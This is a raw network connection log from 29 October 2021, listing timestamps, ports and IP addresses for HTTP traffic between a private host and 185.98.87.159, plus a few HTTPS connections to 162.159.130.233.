Oct 29, 2021 20:49:54.369005919 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.369028091 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.369049072 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.369062901 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.369070053 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.369091988 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.369098902 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.369134903 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.420634031 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.420665026 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.420686960 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.420711040 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.420734882 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.420746088 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.420758009 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.420825958 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.420840979 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421025038 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421053886 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421076059 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421097994 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421132088 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421155930 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421176910 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421183109 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421199083 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421225071 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421233892 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421247959 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421269894 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421271086 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421287060 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421314001 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421338081 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421358109 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421361923 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421400070 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421461105 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421485901 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421508074 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421528101 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421530962 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421552896 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421576023 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421614885 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421648979 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421670914 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421669960 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421695948 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421719074 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421726942 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421740055 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421758890 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421777010 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421799898 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421823025 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421855927 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421878099 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421879053 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421911001 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421931982 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.421938896 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.421977043 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422055960 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422079086 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422107935 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422132015 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422137976 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422161102 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422174931 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422183037 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422223091 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422244072 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422266960 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422270060 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422302008 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422312975 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422343969 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422538996 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422564030 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422586918 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422609091 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422621965 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422633886 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422658920 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.422677040 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.422715902 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473378897 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473401070 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473418951 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473440886 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473507881 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473566055 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473567963 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473596096 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473617077 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473634005 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473650932 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473666906 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473674059 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473685026 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473701954 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473717928 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473758936 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473858118 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473875046 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473892927 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473905087 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473910093 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473927021 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473942995 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.473952055 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.473994017 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474070072 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474087000 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474102020 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474116087 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474118948 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474164009 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474176884 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474195957 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474211931 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474219084 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474229097 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474258900 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474339008 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474366903 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474380016 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474385023 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474404097 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474419117 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474436045 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474445105 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474453926 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474471092 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474486113 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474487066 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474505901 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474514961 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474524021 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474540949 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474544048 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474570036 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.474606991 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474626064 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.474670887 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.475030899 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:54.475433111 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.481040001 CEST	49789	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:54.532212019 CEST	80	49789	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:56.998837948 CEST	49799	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.014040947 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:49:57.014092922 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:49:57.014184952 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:49:57.052479982 CEST	80	49799	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.053309917 CEST	49799	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.061491966 CEST	49799	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.061844110 CEST	49799	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.113718033 CEST	80	49799	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.113742113 CEST	80	49799	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.137011051 CEST	80	49799	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.138803005 CEST	49799	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.139041901 CEST	49799	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.191133022 CEST	80	49799	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.734937906 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.759618998 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:49:57.759643078 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:49:57.788597107 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.788770914 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.789051056 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.789071083 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.820400953 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:49:57.820626974 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:49:57.842317104 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:49:57.842356920 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:49:57.842735052 CEST	443	49800	162.159.130.233	192.168.2.4
Oct 29, 2021 20:49:57.868571997 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868619919 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868648052 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868684053 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868709087 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868732929 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868757963 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868772984 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.868803978 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868824959 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.868843079 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868881941 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.868911982 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.868967056 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922431946 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922483921 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922508955 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922533035 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922558069 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922575951 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922602892 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922625065 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922646999 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922658920 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922678947 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922693014 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922714949 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922728062 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922751904 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922775030 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922787905 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922812939 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922831059 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922847986 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922869921 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922894001 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.922914982 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.922945023 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.924206018 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.924242020 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.926832914 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.926894903 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.926923037 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.927057028 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.942714930 CEST	49800	443	192.168.2.4	162.159.130.233
Oct 29, 2021 20:49:57.976358891 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976387978 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976404905 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976422071 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976439953 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976454973 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976471901 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976488113 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976505041 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976530075 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976557016 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976573944 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976591110 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976598024 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976614952 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976635933 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976677895 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976716995 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976788044 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976808071 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976825953 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976843119 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976866007 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976891041 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976900101 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976916075 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976934910 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976955891 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976958990 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.976974964 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.976993084 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977009058 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977020979 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.977035046 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977051973 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977062941 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.977078915 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977113962 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977123022 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.977138996 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.977147102 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977180958 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.977394104 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977411032 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.977475882 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.980424881 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980448961 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980467081 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980484009 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980499983 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980515957 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980531931 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980678082 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:57.980707884 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:57.980751991 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032074928 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032118082 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032140017 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032161951 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032182932 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032207966 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032224894 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032248974 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032269001 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032284021 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032304049 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032327890 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032335043 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032356024 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032371044 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032387972 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032408953 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032426119 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032439947 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032459021 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032484055 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032489061 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032510996 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032522917 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032540083 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032561064 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032581091 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032593966 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032614946 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032633066 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032646894 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032669067 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032685995 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032701015 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032720089 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032740116 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032753944 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032778025 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032795906 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032810926 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032830954 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032869101 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032881975 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032903910 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032927990 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032941103 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032958984 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.032979012 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.032991886 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033011913 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033031940 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033052921 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.033071995 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033092976 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033102989 CEST	49801	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:49:58.033123016 CEST	80	49801	185.98.87.159	192.168.2.4
Oct 29, 2021 20:49:58.033140898 CEST	49801	80	192.168.2.4	185.98.87.159
